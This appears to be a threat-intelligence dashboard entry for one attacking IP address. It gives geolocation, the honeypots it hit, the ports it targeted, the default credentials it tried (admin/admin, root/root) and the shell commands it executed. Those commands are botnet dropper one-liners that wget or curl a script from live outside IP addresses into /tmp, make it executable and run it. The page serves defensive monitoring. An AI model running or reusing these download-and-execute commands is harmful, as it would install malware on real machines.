Active Threat β’ CRITICAL
64.89.161.198
π―
180
Total Attacks
π
25
Ports
π‘
7
Attack Types
π¦
5
Malware
Geolocation
- Country
- πΈπ¬ Singapore
- City
- Unknown
- ASN
- AS16276
- ISP
- OVH SAS
Attack Types
h0neytr4p
cowrie
honeyaml
dionaea
tanner
honeytrap
ciscoasa
Attacked Ports
2380814431443300030013002300330043005300630073010312833014000400540634444+5
Associated Malware
Attempted Credentials
πadmin/admin
11xπroot/root
6xExecuted Commands
$
echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh2x$
echo SUCCESS2x$
echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.128.118.140/run.sh; curl -O http://45.128.118.140/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh1x$
echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh telnet1xRisk Assessment
95
/100
LowMediumHighCritical